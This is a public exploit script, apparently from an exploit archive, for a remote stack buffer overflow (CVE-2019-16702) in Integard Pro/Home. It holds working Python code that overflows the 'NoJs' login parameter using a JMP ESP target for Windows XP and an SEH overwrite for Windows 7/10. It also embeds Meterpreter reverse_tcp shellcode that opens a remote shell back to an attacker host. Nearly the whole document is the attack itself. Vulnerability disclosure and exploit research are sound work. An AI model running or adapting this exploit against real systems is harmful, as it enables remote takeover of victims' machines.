Exploit Title: Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow Date: 2019-09-22 Exploit Author: purpl3f0xsecur1ty Vendor Homepage: https://www.tucows.com/ Software Link: http://www.tucows.com/preview/519612/Integard-Home Version: Pro 2.2.0.9026 / Home 2.0.0.9021 Tested on: Windows XP / Win7 / Win10 CVE: CVE-2019-16702 #!/usr/bin/python ######################################################## #~Integard Pro 2.2.0.9026 "NoJs" EIP overwrite exploit~# #~~~~~~~~~~~~~~~~Authored by purpl3f0x~~~~~~~~~~~~~~~~~# # The vulnerability: Integard fails to sanitize input# # to the "NoJs" parameter in an HTTP POST request, # # resulting in a stack buffer overflow that overwrites # # the instruction pointer, leading to remote code# # execution. # ######################################################## import socket import os import sys from struct import pack def main(): print "~*Integard RCE Exploit for XP/7/10*~" print "Chose target: (Enter number only)" print "1)-Windows XP" print "2)-Windows 7/10" target = str(input()) host = "10.0.0.130" port = 18881 #################################################### # Integard's functionality interferes with reverse # # and bind shells. Only Meterpreter seems to work. 
# #################################################### # msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=9001 # -b "\x00\x26\x2f\x3d\x3f\x5c" -f python -v meterpreter EXITFUNC=thread meterpreter ="\x90" * 50 meterpreter += "\xda\xcd\xbe\xa2\x51\xce\x97\xd9\x74\x24\xf4" meterpreter += "\x5f\x2b\xc9\xb1\x5b\x83\xef\xfc\x31\x77\x15" meterpreter += "\x03\x77\x15\x40\xa4\x32\x7f\x06\x47\xcb\x80" meterpreter += "\x66\xc1\x2e\xb1\xa6\xb5\x3b\xe2\x16\xbd\x6e" meterpreter += "\x0f\xdd\x93\x9a\x84\x93\x3b\xac\x2d\x19\x1a" meterpreter += "\x83\xae\x31\x5e\x82\x2c\x4b\xb3\x64\x0c\x84" meterpreter += "\xc6\x65\x49\xf8\x2b\x37\x02\x77\x99\xa8\x27" meterpreter += "\xcd\x22\x42\x7b\xc0\x22\xb7\xcc\xe3\x03\x66" meterpreter += "\x46\xba\x83\x88\x8b\xb7\x8d\x92\xc8\xfd\x44" meterpreter += "\x28\x3a\x8a\x56\xf8\x72\x73\xf4\xc5\xba\x86" meterpreter += "\x04\x01\x7c\x78\x73\x7b\x7e\x05\x84\xb8\xfc" meterpreter += "\xd1\x01\x5b\xa6\x92\xb2\x87\x56\x77\x24\x43" meterpreter += "\x54\x3c\x22\x0b\x79\xc3\xe7\x27\x85\x48\x06" meterpreter += "\xe8\x0f\x0a\x2d\x2c\x4b\xc9\x4c\x75\x31\xbc" meterpreter += "\x71\x65\x9a\x61\xd4\xed\x37\x76\x65\xac\x5f" meterpreter += "\xbb\x44\x4f\xa0\xd3\xdf\x3c\x92\x7c\x74\xab" meterpreter += "\x9e\xf5\x52\x2c\x96\x11\x65\xe2\x10\x71\x9b" meterpreter += "\x03\x61\x58\x58\x57\x31\xf2\x49\xd8\xda\x02" meterpreter += "\x75\x0d\x76\x08\xe1\xa4\x87\x0c\x71\xd0\x85" meterpreter += "\x0c\x52\x08\x03\xea\xc4\x1a\x43\xa2\xa4\xca" meterpreter += "\x23\x12\x4d\x01\xac\x4d\x6d\x2a\x66\xe6\x04" meterpreter += "\xc5\xdf\x5f\xb1\x7c\x7a\x2b\x20\x80\x50\x56" meterpreter += "\x62\x0a\x51\xa7\x2d\xfb\x10\xbb\x5a\x9c\xda" meterpreter += "\x43\x9b\x09\xdb\x29\x9f\x9b\x8c\xc5\x9d\xfa" meterpreter += "\xfb\x4a\x5d\x29\x78\x8c\xa1\xac\x49\xe7\x94" meterpreter += "\x3a\xf6\x9f\xd8\xaa\xf6\x5f\x8f\xa0\xf6\x37" meterpreter += "\x77\x91\xa4\x22\x78\x0c\xd9\xff\xed\xaf\x88" meterpreter += "\xac\xa6\xc7\x36\x8b\x81\x47\xc8\xfe\x91\x80" meterpreter += 
"\x36\x7d\xbe\x28\x5f\x7d\xfe\xc8\x9f\x17\xfe" meterpreter += "\x98\xf7\xec\xd1\x17\x38\x0d\xf8\x7f\x50\x84" meterpreter += "\x6d\xcd\xc1\x99\xa7\x93\x5f\x9a\x44\x08\x6f" meterpreter += "\xe1\x25\xaf\x90\x16\x2c\xd4\x90\x17\x50\xea" meterpreter += "\xad\xce\x69\x98\xf0\xd3\xcd\x83\xee\xf9\x3b" meterpreter += "\x2c\xb7\x68\x86\x31\x48\x47\xc5\x4f\xcb\x6d" meterpreter += "\xb6\xab\xd3\x04\xb3\xf0\x53\xf5\xc9\x69\x36" meterpreter += "\xf9\x7e\x89\x13" if target == "1": print "[*] Sending Windows XP payload using meterpreter/reverse_tcp" # JMP ESP at 0x3E087557 in iertutil.dll crash = "A" * 512 crash += pack("<L",0x3E087557) crash += meterpreter crash += "C" * (1500 - len(crash)) buffer = "" buffer += "POST /LoginAdmin HTTP/1.1\r\n" buffer += "Host: 10.0.0.130:18881\r\n" buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\r\n" buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" buffer += "Accept-Language: en-US,en;q=0.5\r\n" buffer += "Accept-Encoding: gzip, deflate\r\n" buffer += "Referer: http://10.0.0.130:18881/\r\n" buffer += "Connection: close\r\n" buffer += "Upgrade-Insecure-Requests: 1\r\n" buffer += "Content-Type: application/x-www-form-urlencoded\r\n" buffer += "Content-Length: 78\r\n\r\n" buffer += "Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=" + crash + "&LoginButtonName=Login\r\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) s.send(buffer) s.close() print "[*] Done" if target == "2": print "[*] Sending Windows 7/10 payload using meterpreter/reverse_tcp" # ASLR IS ON!!! MUST USE NON-ASLR MODULE! 
# POP POP RET in integard.exe (ASLR disabled) nSEH = "\xEB\xD0\x90\x90" # Jump 48 bytes backwards SEH = pack("<L",0x004042B0) jumpCall = "\xEB\x09" # Jump 11 bytes forward to hit the CALL in bigBackJump bigBackJump = "\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF" crash = "\x90" * (2776 -len(jumpCall) - len(bigBackJump) - len(meterpreter) - 50) crash += meterpreter crash += "\x90" * 50 crash += jumpCall crash += bigBackJump crash += nSEH crash += SEH buffer = "" buffer += "POST /LoginAdmin HTTP/1.1\r\n" buffer += "Host: 10.0.0.130:18881\r\n" buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\r\n" buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" buffer += "Accept-Language: en-US,en;q=0.5\r\n" buffer += "Accept-Encoding: gzip, deflate\r\n" buffer += "Referer: http://10.0.0.130:18881/\r\n" buffer += "Connection: close\r\n" buffer += "Upgrade-Insecure-Requests: 1\r\n" buffer += "Content-Type: application/x-www-form-urlencoded\r\n" buffer += "Content-Length: 78\r\n\r\n" buffer += "Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=" + crash + "&LoginButtonName=Login\r\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) s.send(buffer) s.close() print "[*] Done" main() |